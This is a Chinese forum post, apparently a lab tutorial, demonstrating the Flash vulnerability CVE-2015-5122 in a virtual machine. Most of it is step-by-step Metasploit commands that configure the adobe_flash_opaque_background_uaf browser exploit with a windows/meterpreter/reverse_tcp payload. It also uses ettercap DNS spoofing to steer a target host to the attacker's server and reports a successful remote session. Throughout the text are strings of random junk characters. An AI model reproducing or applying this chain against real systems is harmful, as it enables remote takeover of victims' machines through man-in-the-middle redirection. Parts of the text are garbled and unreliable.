cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

' |' J( S4 [2 o 二、cve2015-5122漏洞实例演示虚拟机 1 I9 T* ?- l* [

) O/ u U5 D7 F3 @0 W 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ; I$ N$ s/ |7 }. G7 G0 w

2 Q- ]9 s9 i% ~# O7 x R v$ f search cve-2015-5122如图： ! s& e* k6 N4 m2 c

6 [- g' b6 d1 @, I! t- g V( Z' R % R3 M1 L4 g: G: d

0 ^! a, g" b3 N" o- ~) f 下面我们敲如下命令： " ^4 \7 h }. k% M! [ \ n

1 S# m6 o) g6 | use exploit/multi/browser/adobe_flash_opaque_background_uaf - B' ?2 C$ n/ ^/ Y7 |3 H

8 U' b- `1 e9 p% B7 {, A, X2 M set PAYLOAD windows/meterpreter/reverse_tcp % N) B" R. n) x* k9 l

! E: Z) k, F$ J$ [6 c. @ set LHOST 192.168.0.109 / Z' R& Y- Q, ^8 _

1 D; Q) P; I9 s8 O set URIPATH / /*根目录*/ $ D* s0 v; i m4 o8 E5 g

) ?) T( ^7 G4 E set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ! g3 C( y8 U$ I; i; k! l! Z7 J

1 X3 v) u9 e: x3 m$ r& h set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 " J& j- I/ c0 u% a

3 ~" D. i+ j0 d% j# I, j' t 然后show options如图： ! i! a1 j* k5 R- z* Z

( G4 Z3 F& B; P, H) y $ Z7 C9 m" _7 d1 X6 t+ d y

/ L3 r, ~9 z8 @5 `; Q6 T' L 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
' `( T' a9 `4 u! p+ i' y ]2 C6 X7 q, F u4 T$ m

. ~6 q5 W; U2 l" W( Z) [% @ 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ( v, ~0 C* a8 L8 t' E( d7 U$ f

% B3 b# Q% }$ {6 Q Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf + b' n$ U8 {4 k

* t0 V# y! f) q6 r& V- l$ n , ~, a6 V, J, j9 a$ Y* d; O. L

$ w% H9 E: l: R0 C* l/ _ 成功了，这时候我们断开ettercap，如图： . _- x) |/ M+ j/ r7 i" i# O

1 n8 _; |8 |1 d5 j! U% k+ D3 n , k R/ g, g8 `2 E L) u

" |! i: U, J7 C/ `4 ] Screenshot如图： - w+ v0 K# z! k( V/ L1 t9 z

7 F+ Y: e; R4 H( P7 T' H+ G5 e ( U2 I$ x9 W* Z1 r3 A9 N/ X- B

1 ^* {* N; d2 ?. g1 i: m5 J ~ 8 ` D! S" k0 Z2 W' C

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块